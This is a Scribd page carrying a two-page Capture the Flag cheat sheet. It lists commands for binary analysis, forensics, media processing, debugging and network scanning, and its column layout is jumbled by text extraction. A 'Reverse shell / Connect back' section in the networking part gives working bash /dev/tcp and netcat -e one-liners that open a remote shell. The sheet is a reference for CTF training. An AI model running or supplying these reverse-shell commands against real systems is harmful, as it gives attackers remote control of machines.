0% found this document useful (0 votes)
174 views2 pages

Concise Capture The Flag Cheat Sheet: Disassembly Image Processing

The document provides a concise cheat sheet covering topics like binary analysis, encoding and decoding, debugging, image and audio processing, networking, and more. It includes commands and tools for disassembly, extracting metadata, encoding and decoding files, mounting disk images, debugging programs, and working with databases, videos, and audio.

Uploaded by

Mike
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
174 views2 pages

Concise Capture The Flag Cheat Sheet: Disassembly Image Processing

The document provides a concise cheat sheet covering topics like binary analysis, encoding and decoding, debugging, image and audio processing, networking, and more. It includes commands and tools for disassembly, extracting metadata, encoding and decoding files, mounting disk images, debugging programs, and working with databases, videos, and audio.

Uploaded by

Mike
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

Concise Capture the Flag Cheat Sheet Disassembly Image Processing

Disassemble program $ objdump -d prog Editor (simple) $ pinta image


Binaries and Metadata Extractors Dump RO data section $ objdump -j .rodata -s prog Editor (advanced) $ gimp image
List symbols from program $ nm prog Convert to pnm $ type topnm image.type > image.pnm
Guess file type using magic $ file file
Disassemble (ndisasm) $ ndisasm prog pnm (ppm) format P6 (type)
Printable strings in binary file $ strings file
Disasm. ncurses $ TERM=vt100 biew prog width height (in printable digits)
Hexadecimal dump $ xxd [-c16 -g2 ] file
Assembly nasm, yasm, gas 255 (max color)
$ hexdump file
RGBRGBRGBRGBRGB... (× width × height)
$ od -tx1z file
Bar/qrcode scanner $ zbarimg --raw image.png
Binary hexadecimal editor $ elvis [-c"display hex"] file Debugging Gen. qrcode for word $ qrencode word -o image.png
Extract JPEG EXIF data $ exiv2 img.jpeg
(from X selection) $ import i.png && zbarimg --raw i.png
$ jhead img.jpeg simple / command line $ gdb ./program
OCR in lng lang. $ tesseract [-l lng ] i.png stdout
Extract PNG metadata $ pngcheck -7ptv img.png run program > r [parameters] [< re > directs]
Crop $ convert -crop W xH +HP +VP i.png o.png
List tarball contents $ tar -tf tarball.tar print backtrace > bt
Montage/Concat $ montage -mode concatenate *.png o.png
List zip contents $ unzip -l file.zip set breakpoint on foo > b foo
Extract ID3 metadata $ id3info file.mp3 unset breakpoint(s) > delete breakpoint [no]
next line (over) > n
step line (into) > s
Video Processing
Encoding / Decoding next instruction (over) > ni
Extract Frames $ ffmpeg -i video.mp4 frame-%4d.jpeg
step instruction (into) > si
Encode base64 $ base64 [file ] Downl. vid. (yt/etc) $ youtube-dl "https://example.com/etc "
activate display next instr. > display/i $pc
Decode base64 $ base64 -di [file ]
continue execution > c
(de)code caesar’s $ caesar [0-25]
save memory contents > generate-core-file
Encode morse $ morse -s message
advanced / graphical $ edb ./program
Audio Processing
Decode morse $ morse -d -- ... --- ...
trace system calls $ strace ./program Graphical editor / waveform $ audacity audio.flac
Spectrogram $ sox audio.flac -n spectrogram
Hashes Running and debugging Legacy/Other Systems Extract notes from MIDI $ midi2ly music.midi
md5sum $ md5sum file Generate music sheet $ lilypond music.ly
DOS
sha1sum $ sha1sum file
Open DOS with dir as C: $ dosbox dir Decoding Phone Dialing Tones
sha256sum $ sha256sum file
(debug mode) $ dosbox-debug dir
Run prog in debug mode C:\> debug prog.com Decode DTMF sox tone.ogg -esigned-integer \
Unix / Linux DOSBox-debug step over F10 -b16 -r 22050 -t raw - |
DOSBox-debug step into F11 multimon-ng -c -a DTMF -
Extract tarball contents $ tar -xvf tarball.tar DOSBox-debug scroll memory PgUp / PgDn Anything else sox ... | multimon-ng
Remove first 3 bytes $ tail -c +4 [file ] DOSBox-debug scroll program + / -
Unzip $ unzip file.zip
Windows
Disk Images / Forensics Run executable $ wine prog.exe
Debug executable $ winedbg prog.exe
Mounting FS image $ mount fs.img mountpoint Debug executable $ ollydbg prog.exe
(override user/group) -o uid=user,gid=users
List orphan inodes on disk image $ ils fs.img
List deleted files on disk image $ fls -drp fs.img
IBM PC XT
Output file contents from inode no. $ icat fs.img 1337 Start system fake86 -fd0 /usr/share/fake86/rombasic.bin
(Deleted) file contents on disk img. $ fcat path/to/file fs.img
Android
Databases dex to jar d2j-dex2jar classes.dex
jar contents unzip classes.jar
Open sqlite database $ sqlite3 database.db
List databases > .databases
List tables > .tables
Show table contents > select * from table ;

Copyright 2014-2015, Rudy Matela – Compiled on September 20, 2015 Concise Capture the Flag Cheat Sheet v0.4 This text is available under the Creative Commons Attribution-ShareAlike 3.0 Licence,
Upstream: https://github.com/rudymatela/ultimate-cheat-sheets or (at your option), the GNU Free Documentation License version 1.3 or Later.
Networking Keyboard Scan Codes (US QWERTY) Stuff to install (Arch Linux)

Info about port $ cat /etc/services | grep port 00 10 20 30 40 50 Image processing $ pacman -S pinta gimp netpbm
Image metadata $ pacman -S jhead exiv2 pngcheck
+0 error q d b F6 KP 2
Passive scanning QR/Barcode $ pacman -S zbar qrencode
+1 Esc w f n F7 KP 3
Disk image $ pacman -S sleuthkit libewf
+2 1 e g m F8 KP 0
Network traffic (graphical) $ wireshark Networking (act.) $ pacman -S {gnu,openbsd}-netcat nmap
+3 2 r h ,< F9 KP Del
Network traffic $ tshark -i interface -f filter Networking (psv.) $ pacman -S wireshark-{cli,gtk} tcpdump
+4 3 t j . > F10 SysRq
List interfaces $ tshark -D OCR $ pacman -S tesseract tesseract-data-eng
+5 4 y k /? NmLck –
Wifi HTTP traffic $ tshark -i wlan0 -f "port 80" Encoding/Decoding $ pacman -S bsdgames
+6 5 u l RShift ScLck –
Filter syntax $ man pcap-filter 8086 emulator $ pacman -U fake86-???.pkg.tar.gz # AUR
+7 6 i : ; KP * KP 7 F11
Network traffic (altn.) $ tcpdump Dial Tones $ pacman -S archassault/multimon-ng
+8 7 o ’" LAlt KP 8 F12
Android $ pacman -S archassault/dex2jar
+9 8 p ‘ Space KP 9 –
Active scanning Tools available $ pacman -Ql somekit | grep /bin/
+a 9 {[ LShift CaLck KP - –
+b 0 ]} \| F1 KP 4 –
Open ports on host $ nmap [-sV -O -p prange ] host
+c -_ Enter z F2 KP 5 – Other stuff
List hosts on a network $ nmap [-sn] 192.168.0.*
+d += LCtrl x F3 KP 6 –
Query txt DNS field $ nslookup -query=txt example.com +e Back a c F4 KP + – SQLi https://github.com/sqlmapproject/sqlmap
Query DNS info (on srv ) $ dig [@srv] example.com +f Tab s v F5 KP 1 –

Interacting Number/character conversion


Network cat (GNU/BSD) $ netcat host port
Network cat (nmap altn.) $ ncat host port Ruby Haskell
Telnet to host on port $ telnet host port lib import Data.Char
char to int ’a’.ord ord ’a’
int to char 0x61.chr chr 0x61
Reverse shell / Connect back
from hexadecimal "FF".to_i(16) foldl1 (\x y -> x*16 + y)
netcat listen client$ netcat -vlp 1337 . map digitToInt $ "FF"
Linux connect back $ sh >& /dev/tcp/client/1337 0>&1 to hexadecimal 255.to_s(16) map intToDigit . reverse
(colored) $ bash -i >& /dev/tcp/client/1337 0>&1 . unfoldr
Netcat connect back $ netcat -e /bin/sh localhost 1337 (\n -> listToMaybe
(colored) $ nc -e "/bin/bash -i" localhost 1337 [ swap $ n ‘divMod‘ 16
| n /= 0 ])
$ 255

Dates
Unix to Human date -d "@seconds"
Human to Unix date -d "YYYY-mm-dd HH:MM:SS" -f +%s

Copyright 2014-2015, Rudy Matela – Compiled on September 20, 2015 Concise Capture the Flag Cheat Sheet v0.4 This text is available under the Creative Commons Attribution-ShareAlike 3.0 Licence,
Upstream: https://github.com/rudymatela/ultimate-cheat-sheets or (at your option), the GNU Free Documentation License version 1.3 or Later.

You might also like